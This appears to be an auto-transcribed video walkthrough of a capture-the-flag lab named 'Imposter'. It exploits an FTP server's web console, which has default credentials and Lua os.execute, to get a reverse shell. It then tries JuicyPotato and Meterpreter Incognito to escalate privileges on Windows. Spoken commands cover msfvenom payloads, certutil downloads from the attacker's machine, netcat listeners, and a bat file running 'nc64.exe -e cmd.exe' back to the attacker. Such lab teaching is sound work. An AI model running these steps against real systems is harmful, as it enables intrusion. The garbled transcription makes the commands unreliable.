Welcome back. Today we will be going over another lab from Cyberseclabs. The lab name is, what was the name? Imposter. So the name is Imposter. And in this lab, guys, the core of this lab is exploiting an FTP server that is hosted that's hosted to be accessed from the user interface. So you're going to be exploiting an outdated FTP server and performing some remote commands on the server in order to get reverse shell. And then we're going to be doing Windows privilege escalation. That's about this challenge. So basically the methodology goes like this. So first we did an nmap scan, scripting the versions and the services, and here disable host discovery. And if we go over the nmap results, we can see here we have NetBIOS, which means we can try SMB clients, enumerated there are shares. We go down, we have, as you can see, the web server or FTP server is hosted on port 8080, which means we can access that FTP server from the GUI, right? The operating system, as you can see, is the service info Windows Server 2008 R2, but doesn't have Active Directory. Okay, so that's it about the nmap scan. So the methodology here goes, we either try with the NetBIOS, or we try with the remote desktop, or we try with this FTP server. Now, for this challenge, we're going to be enumerating the FTP server. Let's go back, and this is the FTP server, and it is mounted here, not mounted, hosted on this web interface. So, all the time, we always try logging in with default credentials. So this one works with admin and password. And this is the first mistake that has become quite old to make, leaving default credentials on web applications. So login. When we first log in, we see here the web interface, right? We're going to be trying here, since we have access to a web interface on web application, the next step is to get reverse shell. So we did the enumeration. Now we're gonna, in the cyber kill chain, we did the information gathering, we did the enumeration. Now we do the exploitation. So here in the web interface, if you go to administration, go to console, and here, as you can see, the system administrators can execute Lua commands from here on the system directly. So basically, we're gonna try to simulate the same practice or the same actions by trying to get a reverse shell. And given the fact that the system is Windows, we can do a couple of stuff. Now, let's forget that we are doing a lab machine, right? We have a command prompt or command line in Lua, right? So in order to execute commands, first we need to understand how we can execute commands in Lua. Now you can do that with os.execute. And here we put the command between the double quotes. That's how it works in Lua, guys. So I put the command here, let's say dir. In this case, it didn't work on this, but on the lab machine, because it is lab machine, right? It's broken system. But the thing is, that's how it works. That's how we execute commands on Lua. Now, the next logic step here is to get a reverse shell, right? So we have a couple of options. Among these options, I got only one option to work, but I'm going to list all of the options that you can try in general, not specifically to that test machine or to that lab machine. So you have all the options when you are faced with reality, right? So the first option here, we need to generate a payload, right, and transfer the payload to the system. How can we do that? First, let's launch a new window here. I don't want to confuse myself. So we launch commit Venom, and we choose the build to be Windows, interpreter, reverse TCP, lhost equal to your IP, which can be 10.10.024, lport 4545. The file will be executable, and it's going to be shell, right? I'm not going to click enter because this will not work on this channel. So I'm showing you only the methodology. So once you have generated the payload, your next step is to go back to the prompt here and type the following: OS execute. And here we type cmd.exe since we are executing two commands at the same time. So we need cmd here /c, and here we put double quotes. In double quotes, we need to download the payload right from my machine. So I type cert utility, this is Windows -url cache -f the IP of my machine 24 and the port 8000 is for my case shell.exe and you click enter, right? I'm not going to click enter. Now once you click enter, you download that. Your next step is to execute the payload. Now /c shell.exe and you're going to get reversal. Now before executing the payload, we need to establish listener, right? So a listener here is needed actually. And C-LVP 4545. You run the listener and you run the payload, or you download the payload, or you execute the payload through the web interface. Now the next option you have, go ahead, try this option. In your case, maybe it's going to work. In my case, it didn't work, unfortunately. That's now we transferred the payload. Now we have another option. We don't need to secure the payload. We just need to download netcat, right? So if you downloaded netcat to our machine here, local machine, and if we go here and download netcat the same way we did with the payload we created with MSF Venom, creating a netcat listener and getting a reverse shell. Go ahead and try that as well. In my case, it didn't work. Okay, the next step is we use MSF Venom, or sorry, Metasploit web delivery. So there's a module here, in Metasploit. So we go this one. Okay, let's collapse that. That is great. So here we have, in Metasploit we have web delivery, right? So web delivery, once you see that, you type show options. And show options here, we got a lot of options to provide. So in our case, we need the L host, which is our IP, the L port, and that's it. But in web delivery, we need to specify the target, how we're gonna deliver this payload. So we do that with show targets. So am I gonna deliver the payload with Python, PHP, PSH, Rich server, SVR, PRN, PSH, Linux, Mac OS. So we need to define what is the form of the payload delivery. In my case, it is Reg SVR, since it's not PHP, not Python. So I selected this one. And when you click run, after that, we need to, it's gonna give you that. I should have, I need to do that again, but I'm not going to do that since there is no copy paste on the on this web interface, right? There is no copy paste here, so I'm not going to do that again. It's time consuming. I'm going to show you the methodology again. So here, after I run, right, I need to run that on the FTP command line, right? So we go back here and we type OS of execute cmd .exe/s c, sorry, and here we type exactly. Unfortunately, we cannot copy paste, right? So you may need to do that manually. All right, so type that manually in the web interface and you'll get reversal, the interpreter session. Alternatively, you can just copy paste that, but you need to use a proxy server, and I'm not ready to use a proxy server now. So we got the session here. So if we type sessions I, so here we have the session, right? Sessions I. All right. So sessions I1. So here we have interpreter, right? Now we can drop to shell right now. As you can see, we need first to see what are our privileges, right? Or what is the user. So who am I? So we are layer, right? We are not system authority. So in order to scale our privileges, we first need to understand who we are, what we can do on the system. So who am I? Slash privilege. So that these are our privileges except as it's disabled. So this is what we can do here. We can say create global privilege, impersonate privilege. Here comes juicy potato. And here we have seed change, notify privilege, seed debug privilege. So this is the one, right? See impersonate privilege. Let's impersonate the net authority. We have a couple of ways actually. We can do that with juicy potato, and let's see if we have something else to do. So here, all right. So we got the juicy potato abusing impersonation privilege, and see what we got. What we got else. So these guys Windows local escalation. Let's see this one. Source prone to. All right, what was that? Let's go to the attackers execute code with elevated privileges. I know that now. All right, we exploit real idols here, but I don't think we will be able to execute that. So we can try with juicy potato, but juicy potato we have used that before, if you remember. Maybe we can try something else. All right. Let's see something else here. So this is juicy potato. Okay, let's use juicy potato for that. First, we need to download that, I think. Okay, let's download juicy potato from GitHub. Go down. So this is juicy potato. All right, so I downloaded juicy potato here, and as you can see, it's here. Now we can transfer juicy potato to the target machine, right, and execute from there. So Python 3 and http.server, and in here we can download cert utility, your dash URL cache dash f http 0.24 8000, right? Okay, juicy potato.exe. Okay, access denied. All right, so it seems like we need to go to another directory. So C. Oops. just copying that. Yeah, directory, and go to users, clean. All right, so here we type, see what we have, or let's download from here. Cert yourself -url cache -http juicy potato.exe juicy. All right, so we have downloaded the tool successfully. And now we can launch the tool. It is here. Let's go back and see the instructions again. Juicy potato, go back. So we need a couple of stuff here. First, we need a CLS ID and listening port, listening IP, and a process creation mode. So this is the basic use. So let's first grab the CLS ID. So we go to Google, let's type juicy potato. So here we need to get the one that matches the operating system. So we need the CLS ID for the operating system. I guess let's go to Kali here. And the system was something I cleared in my results, but it was like 2008 something. So let's go back and grab the 2008. All right, so this is the one we need. Let's go back. This is a great example, actually. All right, let's go back, and in here, in the command line, Kali. All right, so here we type juicy.exe-l. The local port number doesn't matter what you put, so 3334, and then let's go back, see what do we have. And this is the process that will be created. So let's try with this one with the CMD, and we put -t star -c. Okay, let's give that here. So -p c, of course, the backslash Windows 32 -t star -c, and we put the CSL ID. So we go back, grab this, and let's execute. Now, after we have downloaded netcat successfully, let's now execute netcat with Juicy. Now, how this works, we need first to import netcat, right, and the IP, the IP and the port, to which we're going to connect to a bat file, and let Juicy execute that bat file. So here I'm going to launch a listener -l lvp 4545, and there let's echo. Grab the path as it is. We specify the path of the netcat file we have just downloaded. It is nc64.exe-ecmd.exe, and we specify the IP and the port to which we're going to connect. In my case, it's going to be my IP. 24, and here we put 4545, and we export that to a bat file. So juice.bat, type juice.bat That is just great. Okay, now after we did that, right, we're gonna execute the bat file with juicy. So directory juicy.exe dash l, gonna be 1334 for example, dash t, and here we put the file. So it's gonna be something, the bat file. So the bat file is, let's specify the full path to the bat file. Where is the bat file? Okay, it's here. So paste juice.bat and the CSLID. Let's pick the CSLID from here. Let's go back here. So what do they have on this point? So go up, click here. I guess this one. All right. Let's try with this one. If this didn't work, it could be that due to the OS being in a different version. So different OS, sorry. So here we can paste that and we enter. So that also didn't work. Click on yes and type here system sysinfo. So this Windows 2012, not 2008. That's our mistake. So let's go back to shell. Let's copy that first, starting from this line all the way here. No, all the way till C, and drop back to shell. And we go back to the browser. Windows 2012 data center, and we choose one of these, right? Okay. Oh, okay. So I got an idea because I'm gonna go back again. So put this here. CD users, CD lane. All right, and let's grab the command again. So from here, we're gonna take, not this one, nope, this one, the net authority. So take that, paste it here, and let's copy that. We go back. All right, enter. All right, I'm not gonna wait. So seems like there is no luck with that. Okay, and of course you can go ahead and try that. All of these are valid methods, but sometimes it needs some, waiting period to work and you receive the shell. Try it on your own, and I think it's gonna work. I'm gonna try something else now with meta interpreter. So here, if I go to background. All right, since all of the juicy stuff didn't work, in my case, yeah, you can try it on your own as well. It's still a valid method. Maybe let's try something else. There's a module in Interpreter called Incognito. The Incognito module is dedicated to impersonate tokens. So let me try that, give it a shot. I hope it works. So load Incognito. All right, so impersonate, or let's put help. So this is the one we are looking for, right? So put that here, and let's first list the tokens that we can impersonate. -u. I'm sorry guys, it was just a video. I lost the connection in the video. Now let's continue with incognito. So basically, let's type help. And incognito commands, we can see we can list the tokens and we can impersonate the token. So it makes sense first to list the available tokens, right? And then we impersonate the right one. So list tokens, list tokens. So we have U and we have J. So G and U list tokens by unique group name and username. We are interested in listing by the group username. Why? Because we need to impersonate the net authority system. So list tokens -u. So this is the one we're looking after. So what we need to do now, impersonate token, and we specify the one we are looking to impersonate. Now let's drop to shell. Oh, and that concludes the video of today. I hope you liked the video and you learned what we have done. Maybe all the time I tried different stuff, different options. Not all the options will work since this is a testing machine, as you know, and not all stuff will work against a testing machine. So we have tried different options with the privilege escalation. Juicy potato didn't work. Now incognito worked as well. The FTP server, you can get the reversal different ways, but the one that worked is the one that is included in the web delivery model in Metasploit. All right then, I hope you liked that, and see you in the next video. And at the end, I provide this is the documentation of the video. As you can see, I outlined the steps, the summary of the video, the steps taken, the commands executed, and along with the screenshots. This is a documentation of the video, and of course, if you want to get a documentation of every video I publish, all you have to do is to go to the video or any video, click on join, and on join, as you can see, I have multiple tiers for joining the memberships. For the video documentation, it is the first tier. You click on join, and you get to have the documentations of every video I publish every day. Thank you for watching and see you in the next video.